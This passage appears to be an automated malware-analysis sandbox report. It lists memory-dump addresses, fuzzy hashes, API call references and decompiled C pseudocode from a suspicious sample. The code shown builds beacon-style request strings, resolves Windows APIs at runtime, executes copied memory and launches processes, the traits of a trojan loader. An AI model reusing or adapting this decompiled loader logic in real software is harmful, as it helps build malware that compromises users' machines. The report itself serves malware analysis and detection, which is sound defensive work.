                                      0x00faaf4f
                                      0x00faaf52
                                      0x00faaf53
                                      0x00faaf55
                                      0x00faaf56
                                      0x00faaf57
                                      0x00faaf5a
                                      0x00faaf64
                                      0x00fab015
                                      0x00fab01c
                                      0x00fab025
                                      0x00faaf6a
                                      0x00faaf6a
                                      0x00faaf70
                                      0x00faaf76
                                      0x00faaf79
                                      0x00faaf7c
                                      0x00faaf80
                                      0x00faaf85
                                      0x00faaf8a
                                      0x00fab00a
                                      0x00000000
                                      0x00faaf8c
                                      0x00faaf8c
                                      0x00faaf98
                                      0x00faaf9a
                                      0x00faaff5
                                      0x00faaff5
                                      0x00faaffb
                                      0x00000000
                                      0x00faaf9c
                                      0x00faafab
                                      0x00faafad
                                      0x00faafae
                                      0x00faafaf
                                      0x00faafb2
                                      0x00faafb2
                                      0x00faafb4
                                      0x00000000
                                      0x00faafb6
                                      0x00faafb6
                                      0x00fab000
                                      0x00faafb8
                                      0x00faafb8
                                      0x00faafbc
                                      0x00faafc4
                                      0x00faafc9
                                      0x00faafce
                                      0x00faafda
                                      0x00faafe2
                                      0x00faafe9
                                      0x00faafef
                                      0x00faaff3
                                      0x00000000
                                      0x00faaff3
                                      0x00faafb6
                                      0x00faafb4
                                      0x00000000
                                      0x00faaf9a
                                      0x00fab00e
                                      0x00fab00e
                                      0x00fab00e
                                      0x00faaf8a
                                      0x00fab02a
                                      0x00fab031

                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1203041666.0000000000FA1000.00000020.00020000.sdmp, Offset: 00FA0000, based on PE: true
                                       • Associated: 00000000.00000002.1203030409.0000000000FA0000.00000004.00020000.sdmp
                                       • Associated: 00000000.00000002.1203071554.0000000000FAC000.00000002.00020000.sdmp
                                       • Associated: 00000000.00000002.1203083910.0000000000FAD000.00000004.00020000.sdmp
                                       • Associated: 00000000.00000002.1203095235.0000000000FAF000.00000002.00020000.sdmp
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 4f37e18b72ef76f3e50d9b898edfd48ae2b22ba2880acf1ff50920e361efee75
                                      • Instruction ID: 20ce181b5b2993cf62c550e2e59aa08f398ca564582a1cdb1d3627b52666c9c7
                                      • Opcode Fuzzy Hash: 4f37e18b72ef76f3e50d9b898edfd48ae2b22ba2880acf1ff50920e361efee75
                                      • Instruction Fuzzy Hash: 4C21A7B29002049FC714DF68CCC196BBBA5BF45360B05C158D915DB246D734F915D7E0
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      C-Code - Quality: 71%
                                      			E100021A4(signed int* __eax, void* __ebx, signed int __edx, char _a4, long _a8, intOrPtr _a12) {
                                      				intOrPtr _v8;
                                      				char _v12;
                                      				void* __ebp;
                                      				signed int* _t43;
                                      				char _t44;
                                      				void* _t46;
                                      				void* _t49;
                                      				intOrPtr* _t53;
                                      				void* _t54;
                                      				void* _t65;
                                      				long _t66;
                                      				signed int* _t80;
                                      				signed int* _t82;
                                      				void* _t84;
                                      				signed int _t86;
                                      				void* _t89;
                                      				void* _t95;
                                      				void* _t96;
                                      				void* _t99;
                                      				void* _t106;
                                      
                                      				_t43 = _t84;
                                      				_t65 = __ebx + 2;
                                      				 *_t43 =  *_t43 ^ __edx ^  *__eax;
                                      				_t89 = _t95;
                                      				_t96 = _t95 - 8;
                                      				_push(_t65);
                                      				_push(_t84);
                                      				_push(_t89);
                                      				asm("cld");
                                      				_t66 = _a8;
                                      				_t44 = _a4;
                                      				if(( *(_t44 + 4) & 0x00000006) != 0) {
                                      					_push(_t89);
                                      					E1000230B(_t66 + 0x10, _t66, 0xffffffff);
                                      					_t46 = 1;
                                      				} else {
                                      					_v12 = _t44;
                                      					_v8 = _a12;
                                      					 *((intOrPtr*)(_t66 - 4)) =  &_v12;
                                      					_t86 =  *(_t66 + 0xc);
                                      					_t80 =  *(_t66 + 8);
                                      					_t49 = E100023C5(_t66);
                                      					_t99 = _t96 + 4;
                                      					if(_t49 == 0) {
                                      						 *(_a4 + 4) =  *(_a4 + 4) | 0x00000008;
                                      						goto L11;
                                      					} else {
                                      						while(_t86 != 0xffffffff) {
                                      							_t53 =  *((intOrPtr*)(_t80 + 4 + (_t86 + _t86 * 2) * 4));
                                      							if(_t53 == 0) {
                                      								L8:
                                      								_t80 =  *(_t66 + 8);
                                      								_t86 = _t80[_t86 + _t86 * 2];
                                      								continue;
                                      							} else {
                                      								_t54 =  *_t53();
                                      								_t89 = _t89;
                                      								_t86 = _t86;
                                      								_t66 = _a8;
                                      								_t55 = _t54;
                                      								_t106 = _t54;
                                      								if(_t106 == 0) {
                                      									goto L8;
                                      								} else {
                                      									if(_t106 < 0) {
                                      										_t46 = 0;
                                      									} else {
                                      										_t82 =  *(_t66 + 8);
                                      										E100022B0(_t55, _t66);
                                      										_t89 = _t66 + 0x10;
                                      										E1000230B(_t89, _t66, 0);
                                      										_t99 = _t99 + 0xc;
                                      										E100023A7(_t82[2]);
                                      										 *(_t66 + 0xc) =  *_t82;
                                      										_t66 = 0;
                                      										_t86 = 0;
                                      										 *(_t82[2])(1);
                                      										goto L8;
                                      									}
                                      								}
                                      							}
                                      							goto L13;
                                      						}
                                      						L11:
                                      						_t46 = 1;
                                      					}
                                      				}
                                      				L13:
                                      				return _t46;
                                       			}

                                      0x100021a8
                                      0x100021a9
                                      0x100021aa
                                      0x100021ad
                                      0x100021af
                                      0x100021b2
                                      0x100021b3
                                      0x100021b5
                                      0x100021b6
                                      0x100021b7
                                      0x100021ba
                                      0x100021c4
                                      0x10002275
                                      0x1000227c
                                      0x10002285
                                      0x100021ca
                                      0x100021ca
                                      0x100021d0
                                      0x100021d6
                                      0x100021d9
                                      0x100021dc
                                      0x100021e0
                                      0x100021e5
                                      0x100021ea
                                      0x1000226a
                                      0x00000000
                                      0x100021ec
                                      0x100021ec
                                      0x100021f8
                                      0x100021fa
                                      0x10002255
                                      0x10002255
                                      0x1000225b
                                      0x00000000
                                      0x100021fc
                                      0x1000220b
                                      0x1000220d
                                      0x1000220e
                                      0x1000220f
                                      0x10002212
                                      0x10002212
                                      0x10002214
                                      0x00000000
                                      0x10002216
                                      0x10002216
                                      0x10002260
                                      0x10002218
                                      0x10002218
                                      0x1000221c
                                      0x10002224
                                      0x10002229
                                      0x1000222e
                                      0x1000223a
                                      0x10002242
                                      0x10002249
                                      0x1000224f
                                      0x10002253
                                      0x00000000
                                      0x10002253
                                      0x10002216
                                      0x10002214
                                      0x00000000
                                      0x100021fa
                                      0x1000226e
                                      0x1000226e
                                      0x1000226e
                                      0x100021ea
                                      0x1000228a
                                      0x10002291

                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1203692566.0000000010000000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true
                                      • Associated: 00000000.00000002.1203708719.0000000010005000.00000040.00000001.sdmp
                                      Yara matches
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 12a7070065f657aa0aacf06b7ef6137888dfa06173cfdd6141a47a1bb7c7c469
                                      • Instruction ID: 237e667de8eea833f5a963452b53f6ad9b15aba12f2c2e3f9f83011bab3cc983
                                      • Opcode Fuzzy Hash: 12a7070065f657aa0aacf06b7ef6137888dfa06173cfdd6141a47a1bb7c7c469
                                      • Instruction Fuzzy Hash: 5321B676904204ABDB10DFA8CCC09ABF7A5FF49390B468168ED559B249D730FA15C7E0
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      C-Code - Quality: 70%
                                      			E00FA3C32(long __eax, void* __edx, intOrPtr _a4, intOrPtr _a12, void* _a20, intOrPtr _a28) {
                                      				intOrPtr _v8;
                                      				intOrPtr _v12;
                                      				intOrPtr _v16;
                                      				void* _v28;
                                      				intOrPtr _v44;
                                      				void* __ecx;
                                      				void* __edi;
                                      				intOrPtr _t32;
                                      				intOrPtr _t33;
                                      				intOrPtr _t34;
                                      				intOrPtr _t35;
                                      				intOrPtr _t36;
                                      				void* _t39;
                                      				intOrPtr _t40;
                                      				int _t43;
                                      				void* _t44;
                                      				intOrPtr _t45;
                                      				intOrPtr _t49;
                                      				intOrPtr _t53;
                                      				intOrPtr _t56;
                                      				intOrPtr _t57;
                                      				intOrPtr _t63;
                                      				intOrPtr _t67;
                                      				intOrPtr* _t69;
                                      				intOrPtr _t75;
                                      				intOrPtr _t81;
                                      				intOrPtr _t84;
                                      				intOrPtr _t87;
                                      				int _t90;
                                      				intOrPtr _t91;
                                      				int _t94;
                                      				intOrPtr _t95;
                                      				int _t98;
                                      				void* _t101;
                                      				void* _t102;
                                      				void* _t106;
                                      				intOrPtr _t108;
                                      				long _t110;
                                      				intOrPtr _t111;
                                      				intOrPtr* _t112;
                                      				long _t113;
                                      				int _t114;
                                      				void* _t115;
                                      				void* _t116;
                                      				void* _t117;
                                      				void* _t118;
                                      				void* _t120;
                                      				void* _t121;
                                      				void* _t123;
                                      				void* _t124;
                                      
                                      				_t106 = __edx;
                                      				_t113 = __eax;
                                      				_v8 = 8;
                                      				_t120 = RtlAllocateHeap( *0xfad1f0, 0, 0x800);
                                      				if(_t120 != 0) {
                                      					if(_t113 == 0) {
                                      						_t113 = GetTickCount();
                                      					}
                                      					_t32 =  *0xfad018; // 0x8a48e7c8
                                      					asm("bswap eax");
                                      					_t33 =  *0xfad014; // 0x5cb11ae7
                                      					asm("bswap eax");
                                      					_t34 =  *0xfad010; // 0x15dc9586
                                      					asm("bswap eax");
                                      					_t35 =  *0xfad00c; // 0x67522d90
                                      					asm("bswap eax");
                                      					_t36 =  *0xfad230; // 0x2a9a5a8
                                      					_t2 = _t36 + 0xfae622; // 0x74666f73
                                      					_t114 = wsprintfA(_t120, _t2, 2, 0x3d13b, _t35, _t34, _t33, _t32,  *0xfad02c,  *0xfad004, _t113);
                                      					_t39 = E00FA7C63();
                                      					_t40 =  *0xfad230; // 0x2a9a5a8
                                      					_t3 = _t40 + 0xfae662; // 0x74707526
                                      					_t43 = wsprintfA(_t114 + _t120, _t3, _t39);
                                      					_t123 = _t121 + 0x38;
                                      					_t115 = _t114 + _t43;
                                      					if(_a12 != 0) {
                                      						_t95 =  *0xfad230; // 0x2a9a5a8
                                      						_t7 = _t95 + 0xfae66d; // 0x732526
                                      						_t98 = wsprintfA(_t115 + _t120, _t7, _a12);
                                      						_t123 = _t123 + 0xc;
                                      						_t115 = _t115 + _t98;
                                      					}
                                      					_t44 = E00FA4930(_t102);
                                      					_t45 =  *0xfad230; // 0x2a9a5a8
                                      					_t9 = _t45 + 0xfae38a; // 0x6d697426
                                      					_t116 = _t115 + wsprintfA(_t115 + _t120, _t9, _t44, _t106);
                                      					_t49 =  *0xfad230; // 0x2a9a5a8
                                      					_t11 = _t49 + 0xfae33b; // 0x74636126
                                      					_t117 = _t116 + wsprintfA(_t116 + _t120, _t11, 0);
                                      					_t53 =  *0xfad284; // 0x3a495b0
                                      					_t124 = _t123 + 0x1c;
                                      					if(_t53 != 0) {
                                      						_t91 =  *0xfad230; // 0x2a9a5a8
                                      						_t13 = _t91 + 0xfae685; // 0x73797326
                                      						_t94 = wsprintfA(_t117 + _t120, _t13, _t53);
                                      						_t124 = _t124 + 0xc;
                                      						_t117 = _t117 + _t94;
                                      					}
                                      					_t108 =  *0xfad2d4; // 0x3a49630
                                      					_a28 = E00FA66E0(0xfad00a, _t108 + 4);
                                      					_t56 =  *0xfad278; // 0x3a495e0
                                      					_t110 = 0;
                                      					if(_t56 != 0) {
                                      						_t87 =  *0xfad230; // 0x2a9a5a8
                                      						_t16 = _t87 + 0xfae8ea; // 0x3d736f26
                                      						_t90 = wsprintfA(_t117 + _t120, _t16, _t56);
                                      						_t124 = _t124 + 0xc;
                                      						_t117 = _t117 + _t90;
                                      					}
                                      					_t57 =  *0xfad274; // 0x0
                                      					if(_t57 != _t110) {
                                      						_t84 =  *0xfad230; // 0x2a9a5a8
                                      						_t18 = _t84 + 0xfae8c1; // 0x3d706926
                                      						wsprintfA(_t117 + _t120, _t18, _t57);
                                      					}
                                      					if(_a28 != _t110) {
                                      						_t101 = RtlAllocateHeap( *0xfad1f0, _t110, 0x800);
                                      						if(_t101 != _t110) {
                                      							E00FA28E3(GetTickCount());
                                      							_t63 =  *0xfad2d4; // 0x3a49630
                                      							__imp__(_t63 + 0x40);
                                      							asm("lock xadd [eax], ecx");
                                      							_t67 =  *0xfad2d4; // 0x3a49630
                                      							__imp__(_t67 + 0x40);
                                      							_t69 =  *0xfad2d4; // 0x3a49630
                                      							_t118 = E00FA49EC(1, _t106, _t120,  *_t69);
                                      							asm("lock xadd [eax], ecx");
                                      							if(_t118 != _t110) {
                                      								StrTrimA(_t118, 0xfac2c4);
                                      								_t75 =  *0xfad230; // 0x2a9a5a8
                                      								_push(_t118);
                                      								_t20 = _t75 + 0xfae2d2; // 0x53002f
                                      								_t111 = E00FA9FA4(_t20);
                                      								_v8 = _t111;
                                      								if(_t111 != 0) {
                                      									 *_t118 = 0;
                                      									__imp__(_t101, _a4);
                                      									_t112 = __imp__;
                                      									 *_t112(_t101, _t111);
                                      									 *_t112(_t101, _t118);
                                      									_t81 = E00FAA23C(0xffffffffffffffff, _t101, _v16, _v12);
                                      									_v44 = _t81;
                                      									if(_t81 != 0 && _t81 != 0x10d2) {
                                      										E00FA54F9();
                                      									}
                                      									HeapFree( *0xfad1f0, 0, _v28);
                                      								}
                                      								HeapFree( *0xfad1f0, 0, _t118);
                                      								_t110 = 0;
                                      							}
                                      							HeapFree( *0xfad1f0, _t110, _t101);
                                      						}
                                      						HeapFree( *0xfad1f0, _t110, _a20);
                                      					}
                                      					HeapFree( *0xfad1f0, _t110, _t120);
                                      				}
                                      				return _v16;
                                      			}

                                      APIs
                                      • RtlAllocateHeap.NTDLL(00000000,00000800,?), ref: 00FA3C50
                                      • GetTickCount.KERNEL32 ref: 00FA3C64
                                      • wsprintfA.USER32 ref: 00FA3CB3
                                      • wsprintfA.USER32 ref: 00FA3CD0
                                      • wsprintfA.USER32 ref: 00FA3CF1
                                      • wsprintfA.USER32 ref: 00FA3D0F
                                      • wsprintfA.USER32 ref: 00FA3D24
                                      • wsprintfA.USER32 ref: 00FA3D45
                                      • wsprintfA.USER32 ref: 00FA3D7F
                                      • wsprintfA.USER32 ref: 00FA3D9F
                                      • RtlAllocateHeap.NTDLL(00000000,00000800), ref: 00FA3DBA
                                      • GetTickCount.KERNEL32 ref: 00FA3DCA
                                      • RtlEnterCriticalSection.NTDLL(03A495F0), ref: 00FA3DDE
                                      • RtlLeaveCriticalSection.NTDLL(03A495F0), ref: 00FA3DFC
                                        • Part of subcall function 00FA49EC: lstrlen.KERNEL32(00000000,253D7325,00000000,00000000,00000000,?,00000000,00FA3E0F,00000000,03A49630), ref: 00FA4A17
                                        • Part of subcall function 00FA49EC: lstrlen.KERNEL32(00000000,?,00000000,00FA3E0F,00000000,03A49630), ref: 00FA4A1F
                                        • Part of subcall function 00FA49EC: strcpy.NTDLL ref: 00FA4A36
                                        • Part of subcall function 00FA49EC: lstrcat.KERNEL32(00000000,00000000), ref: 00FA4A41
                                        • Part of subcall function 00FA49EC: StrTrimA.SHLWAPI(00000000,=,00000000,00000000,00FA3E0F,?,00000000,00FA3E0F,00000000,03A49630), ref: 00FA4A5E
                                      • StrTrimA.SHLWAPI(00000000,00FAC2C4,00000000,03A49630), ref: 00FA3E2E
                                        • Part of subcall function 00FA9FA4: lstrlen.KERNEL32(00FA3E46,00000000,00000000,00FA3E46,0053002F,00000000), ref: 00FA9FB0
                                        • Part of subcall function 00FA9FA4: lstrlen.KERNEL32(?), ref: 00FA9FB8
                                        • Part of subcall function 00FA9FA4: lstrcpy.KERNEL32(00000000,?), ref: 00FA9FCF
                                        • Part of subcall function 00FA9FA4: lstrcat.KERNEL32(00000000,?), ref: 00FA9FDA
                                      • lstrcpy.KERNEL32(00000000,?), ref: 00FA3E58
                                      • lstrcat.KERNEL32(00000000,00000000), ref: 00FA3E66
                                      • lstrcat.KERNEL32(00000000,00000000), ref: 00FA3E6A
                                      • HeapFree.KERNEL32(00000000,?,00000000,?,?), ref: 00FA3E9A
                                      • HeapFree.KERNEL32(00000000,00000000,0053002F,00000000), ref: 00FA3EA9
                                      • HeapFree.KERNEL32(00000000,00000000,00000000,03A49630), ref: 00FA3EB9
                                      • HeapFree.KERNEL32(00000000,?), ref: 00FA3ECA
                                      • HeapFree.KERNEL32(00000000,00000000), ref: 00FA3ED8
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1203041666.0000000000FA1000.00000020.00020000.sdmp, Offset: 00FA0000, based on PE: true
                                      • Associated: 00000000.00000002.1203030409.0000000000FA0000.00000004.00020000.sdmp
                                      • Associated: 00000000.00000002.1203071554.0000000000FAC000.00000002.00020000.sdmp
                                      • Associated: 00000000.00000002.1203083910.0000000000FAD000.00000004.00020000.sdmp
                                      • Associated: 00000000.00000002.1203095235.0000000000FAF000.00000002.00020000.sdmp
                                      Similarity
                                      • API ID: wsprintf$Heap$Free$lstrcatlstrlen$AllocateCountCriticalSectionTickTrimlstrcpy$EnterLeavestrcpy
                                      • String ID:
                                      • API String ID: 1837416118-0
                                      • Opcode ID: 0baa2a19506fef67f37a5c2042134d03684de4cba8235c8a4b4cee527956fdec
                                      • Instruction ID: 27b9ac724ae7131ed045396029ffa7388f73901be15c097ff6b373d2dde6e4f8
                                      • Opcode Fuzzy Hash: 0baa2a19506fef67f37a5c2042134d03684de4cba8235c8a4b4cee527956fdec
                                      • Instruction Fuzzy Hash: 73713AF2900209AFD721DB68DC88E577BECEB8A710B054555F94AC3620E639E905EBB0
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      C-Code - Quality: 61%
                                      			E00FAA3FC(void* __eax, void* __ecx) {
                                      				long _v8;
                                      				void* _v12;
                                      				void* _v16;
                                      				void* _v28;
                                      				long _v32;
                                      				void _v104;
                                      				char _v108;
                                      				long _t39;
                                      				intOrPtr _t42;
                                      				intOrPtr _t49;
                                      				void* _t51;
                                      				intOrPtr _t52;
                                      				void* _t60;
                                      				intOrPtr* _t65;
                                      				intOrPtr _t69;
                                      				intOrPtr* _t71;
                                      				intOrPtr* _t74;
                                      
                                      				_t1 = __eax + 0x14; // 0x74183966
                                      				_t69 =  *_t1;
                                      				_t39 = E00FA484A(__ecx,  *(_t69 + 0xc),  &_v12,  &_v16);
                                      				_v8 = _t39;
                                      				if(_t39 != 0) {
                                      					L12:
                                      					return _v8;
                                      				}
                                      				memcpy(_v12,  *(_t69 + 8),  *(_t69 + 0xc));
                                      				_t42 = _v12(_v12);
                                      				_v8 = _t42;
                                      				if(_t42 == 0 && ( *0xfad218 & 0x00000001) != 0) {
                                      					_v32 = 0;
                                      					asm("stosd");
                                      					asm("stosd");
                                      					asm("stosd");
                                      					_v108 = 0;
                                      					memset( &_v104, 0, 0x40);
                                      					_t49 =  *0xfad230; // 0x2a9a5a8
                                      					_t18 = _t49 + 0xfae55b; // 0x73797325
                                      					_t51 = E00FA99D3(_t18);
                                      					_v12 = _t51;
                                      					if(_t51 == 0) {
                                      						_v8 = 8;
                                      					} else {
                                      						_t52 =  *0xfad230; // 0x2a9a5a8
                                      						_t20 = _t52 + 0xfae73d; // 0x3a48ce5
                                      						_t21 = _t52 + 0xfae0af; // 0x4e52454b
                                      						_t65 = GetProcAddress(GetModuleHandleA(_t21), _t20);
                                      						if(_t65 == 0) {
                                      							_v8 = 0x7f;
                                      						} else {
                                      							_t71 = __imp__;
                                      							_v108 = 0x44;
                                      							 *_t71(0);
                                      							_t60 =  *_t65(0, _v12, 0, 0, 0, 0x4000000, 0, 0,  &_v108,  &_v32);
                                      							 *_t71(1);
                                      							if(_t60 == 0) {
                                      								_v8 = GetLastError();
                                      							} else {
                                      								CloseHandle(_v28);
                                      								CloseHandle(_v32);
                                      							}
                                      						}
                                      						HeapFree( *0xfad1f0, 0, _v12);
                                      					}
                                      				}
                                      				_t74 = _v16;
                                      				 *((intOrPtr*)(_t74 + 0x18))( *((intOrPtr*)(_t74 + 0x1c))( *_t74));
                                      				E00FAA07B(_t74);
                                      				goto L12;
                                      			}

                                      APIs
                                        • Part of subcall function 00FA484A: GetModuleHandleA.KERNEL32(4C44544E,00000020,74183966,00000000,00000000,?,?,?,00FAA418,?,?,?,?,00000000,00000000), ref: 00FA486F
                                        • Part of subcall function 00FA484A: GetProcAddress.KERNEL32(00000000,7243775A), ref: 00FA4891
                                        • Part of subcall function 00FA484A: GetProcAddress.KERNEL32(00000000,614D775A), ref: 00FA48A7
                                        • Part of subcall function 00FA484A: GetProcAddress.KERNEL32(00000000,6E55775A), ref: 00FA48BD
                                        • Part of subcall function 00FA484A: GetProcAddress.KERNEL32(00000000,4E6C7452), ref: 00FA48D3
                                        • Part of subcall function 00FA484A: GetProcAddress.KERNEL32(00000000,6C43775A), ref: 00FA48E9
                                      • memcpy.NTDLL(?,?,?,?,?,?,?,00000000,00000000), ref: 00FAA42E
                                      • memset.NTDLL ref: 00FAA469
                                        • Part of subcall function 00FA99D3: ExpandEnvironmentStringsA.KERNEL32(00000000,00000000,00000000,00000000,?,63699BCE,00FA7E58,73797325), ref: 00FA99E4
                                        • Part of subcall function 00FA99D3: ExpandEnvironmentStringsA.KERNEL32(?,00000000,00000000,00000000), ref: 00FA99FE
                                      • GetModuleHandleA.KERNEL32(4E52454B,03A48CE5,73797325), ref: 00FAA4A0
                                      • GetProcAddress.KERNEL32(00000000), ref: 00FAA4A7
                                      • Wow64EnableWow64FsRedirection.KERNEL32(00000000), ref: 00FAA4C1
                                      • Wow64EnableWow64FsRedirection.KERNEL32(00000001), ref: 00FAA4DF
                                      • CloseHandle.KERNEL32(00000000), ref: 00FAA4EE
                                      • CloseHandle.KERNEL32(?), ref: 00FAA4F3
                                      • GetLastError.KERNEL32 ref: 00FAA4F7
                                      • HeapFree.KERNEL32(00000000,?), ref: 00FAA513
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1203041666.0000000000FA1000.00000020.00020000.sdmp, Offset: 00FA0000, based on PE: true
                                       • Associated: 00000000.00000002.1203030409.0000000000FA0000.00000004.00020000.sdmp
                                       • Associated: 00000000.00000002.1203071554.0000000000FAC000.00000002.00020000.sdmp
                                       • Associated: 00000000.00000002.1203083910.0000000000FAD000.00000004.00020000.sdmp
                                       • Associated: 00000000.00000002.1203095235.0000000000FAF000.00000002.00020000.sdmp
                                      Similarity
                                      • API ID: AddressProc$HandleWow64$CloseEnableEnvironmentExpandModuleRedirectionStrings$ErrorFreeHeapLastmemcpymemset
                                      • String ID:
                                      • API String ID: 1222765985-0
                                      • Opcode ID: 90cd766875612dff374d1fac21afece24f05134506b5a788f4970ad2249d6c1e
                                      • Instruction ID: c7ffa1cb935e29af9903d0164990086e1e9cae5171f6cfcf0eb9a8542a70e2c2
                                      • Opcode Fuzzy Hash: 90cd766875612dff374d1fac21afece24f05134506b5a788f4970ad2249d6c1e
                                      • Instruction Fuzzy Hash: EE4127B6D00219FFCB11ABA4DC48ADEBFB8EF0A354F144451E206E3120D7759A49EBA1
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      C-Code - Quality: 56%
                                      			E00FA6470(void* __ecx, intOrPtr _a4, WCHAR* _a8, WCHAR* _a12, intOrPtr* _a16, intOrPtr* _a20) {
                                      				intOrPtr _v8;
                                      				intOrPtr _v12;
                                      				char _v16;
                                      				signed int _v20;
                                      				void* __esi;
                                      				intOrPtr _t42;
                                      				intOrPtr _t44;
                                      				void* _t46;
                                      				void* _t47;
                                      				void* _t48;
                                      				int _t49;
                                      				intOrPtr _t53;
                                      				WCHAR* _t56;
                                      				void* _t57;
                                      				int _t58;
                                      				intOrPtr _t64;
                                      				void* _t69;
                                      				intOrPtr* _t73;
                                      				void* _t74;
                                      				intOrPtr _t75;
                                      				intOrPtr _t79;
                                      				intOrPtr* _t85;
                                      				intOrPtr _t88;
                                      
                                      				_t74 = __ecx;
                                      				_t79 =  *0xfad2ec; // 0x3a49c40
                                      				_v20 = 8;
                                      				_v16 = GetTickCount();
                                      				_t42 = E00FA69A9(_t74,  &_v16);
                                      				_v12 = _t42;
                                      				if(_t42 == 0) {
                                      					_v12 = 0xfac1cc;
                                      				}
                                      				_t44 = E00FA99A0(_t79);
                                      				_v8 = _t44;
                                      				if(_t44 != 0) {
                                      					_t85 = __imp__;
                                      					_t46 =  *_t85(_v12, _t69);
                                      					_t47 =  *_t85(_v8);
                                      					_t48 =  *_t85(_a4);
                                      					_t49 = lstrlenW(_a8);
                                      					_t53 = E00FA550F(lstrlenW(0xfaead8) + _t48 + _t46 + _t46 + _t47 + _t49 + lstrlenW(0xfaead8) + _t48 + _t46 + _t46 + _t47 + _t49 + 2);
                                      					_v16 = _t53;
                                      					if(_t53 != 0) {
                                      						_t75 =  *0xfad230; // 0x2a9a5a8
                                      						_t73 =  *0xfad120; // 0xfaaab3
                                      						_t18 = _t75 + 0xfaead8; // 0x530025
                                      						 *_t73(_t53, _t18, _v12, _v12, _a4, _v8, _a8);
                                      						_t56 =  *_t85(_v8);
                                      						_a8 = _t56;
                                      						_t57 =  *_t85(_a4);
                                      						_t58 = lstrlenW(_a12);
                                      						_t88 = E00FA550F(lstrlenW(0xfaebf8) + _a8 + _t57 + _t58 + lstrlenW(0xfaebf8) + _a8 + _t57 + _t58 + 2);
                                      						if(_t88 == 0) {
                                      							E00FAA07B(_v16);
                                      						} else {
                                      							_t64 =  *0xfad230; // 0x2a9a5a8
                                      							_t31 = _t64 + 0xfaebf8; // 0x73006d
                                      							 *_t73(_t88, _t31, _a4, _v8, _a12);
                                      							 *_a16 = _v16;
                                      							_v20 = _v20 & 0x00000000;
                                      							 *_a20 = _t88;
                                      						}
                                      					}
                                      					E00FAA07B(_v8);
                                      				}
                                      				return _v20;
                                       			}

                                      0x00fa6470
                                      0x00fa6478
                                      0x00fa647e
                                      0x00fa648e
                                      0x00fa6491
                                      0x00fa6498
                                      0x00fa649b
                                      0x00fa649d
                                      0x00fa649d
                                      0x00fa64a6
                                      0x00fa64ad
                                      0x00fa64b0
                                      0x00fa64b6
                                      0x00fa64c0
                                      0x00fa64c9
                                      0x00fa64d0
                                      0x00fa64de
                                      0x00fa64f0
                                      0x00fa64f7
                                      0x00fa64fa
                                      0x00fa6503
                                      0x00fa650c
                                      0x00fa6515
                                      0x00fa6523
                                      0x00fa652b
                                      0x00fa6530
                                      0x00fa6533
                                      0x00fa653e
                                      0x00fa6555
                                      0x00fa6559
                                      0x00fa658c
                                      0x00fa655b
                                      0x00fa655e
                                      0x00fa6566
                                      0x00fa6571
                                      0x00fa6579
                                      0x00fa6581
                                      0x00fa6585
                                      0x00fa6585
                                      0x00fa6559
                                      0x00fa6594
                                      0x00fa6599
                                      0x00fa65a0

                                      APIs
                                      • GetTickCount.KERNEL32 ref: 00FA6485
                                      • lstrlen.KERNEL32(00000000,80000002), ref: 00FA64C0
                                      • lstrlen.KERNEL32(?), ref: 00FA64C9
                                      • lstrlen.KERNEL32(00000000), ref: 00FA64D0
                                      • lstrlenW.KERNEL32(80000002), ref: 00FA64DE
                                      • lstrlenW.KERNEL32(00FAEAD8), ref: 00FA64E7
                                      • lstrlen.KERNEL32(?), ref: 00FA652B
                                      • lstrlen.KERNEL32(?), ref: 00FA6533
                                      • lstrlenW.KERNEL32(?), ref: 00FA653E
                                      • lstrlenW.KERNEL32(00FAEBF8), ref: 00FA6547
                                        • Part of subcall function 00FAA07B: HeapFree.KERNEL32(00000000,00000000,00FA8705,00000000,?,?,00000000,?,?,?,?,?,?,00FA2540,00000000), ref: 00FAA087
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1203041666.0000000000FA1000.00000020.00020000.sdmp, Offset: 00FA0000, based on PE: true
                                       • Associated: 00000000.00000002.1203030409.0000000000FA0000.00000004.00020000.sdmp
                                       • Associated: 00000000.00000002.1203071554.0000000000FAC000.00000002.00020000.sdmp
                                       • Associated: 00000000.00000002.1203083910.0000000000FAD000.00000004.00020000.sdmp
                                       • Associated: 00000000.00000002.1203095235.0000000000FAF000.00000002.00020000.sdmp
                                      Similarity
                                      • API ID: lstrlen$CountFreeHeapTick
                                      • String ID:
                                      • API String ID: 2535036572-0
                                      • Opcode ID: 0fc7a62d93870c493d88be48188a4ac985ceefaabaa408a120b8be1dc1de017c
                                      • Instruction ID: d2c5d8a5a5b3d45c1f7a54c5c635d1d9ca43b72ac18218d66082a2e7be89198d
                                      • Opcode Fuzzy Hash: 0fc7a62d93870c493d88be48188a4ac985ceefaabaa408a120b8be1dc1de017c
                                      • Instruction Fuzzy Hash: 9F3158B6D0021DAFCF01AFA4CC4499E7FB5FF4A354B098065E904A7221DB35DA15EFA0
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      C-Code - Quality: 64%
                                      			E00FA49EC(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8) {
                                      				intOrPtr _v8;
                                      				intOrPtr _t9;
                                      				intOrPtr _t13;
                                      				char* _t28;
                                      				void* _t33;
                                      				void* _t34;
                                      				char* _t36;
                                      				intOrPtr* _t40;
                                      				char* _t41;
                                      				char* _t42;
                                      				char* _t43;
                                      
                                      				_t34 = __edx;
                                      				_push(__ecx);
                                      				_t9 =  *0xfad230; // 0x2a9a5a8
                                      				_t1 = _t9 + 0xfae61b; // 0x253d7325
                                      				_t36 = 0;
                                      				_t28 = E00FA8990(__ecx, _t1);
                                      				if(_t28 != 0) {
                                      					_t40 = __imp__;
                                      					_t13 =  *_t40(_t28);
                                      					_v8 = _t13;
                                      					_t6 =  *_t40(_a4) + 1; // 0x3a49631
                                      					_t41 = E00FA550F(_v8 + _t6);
                                      					if(_t41 != 0) {
                                      						strcpy(_t41, _t28);
                                      						_pop(_t33);
                                      						__imp__(_t41, _a4);
                                      						_t36 = E00FA51A8(_t34, _t41, _a8);
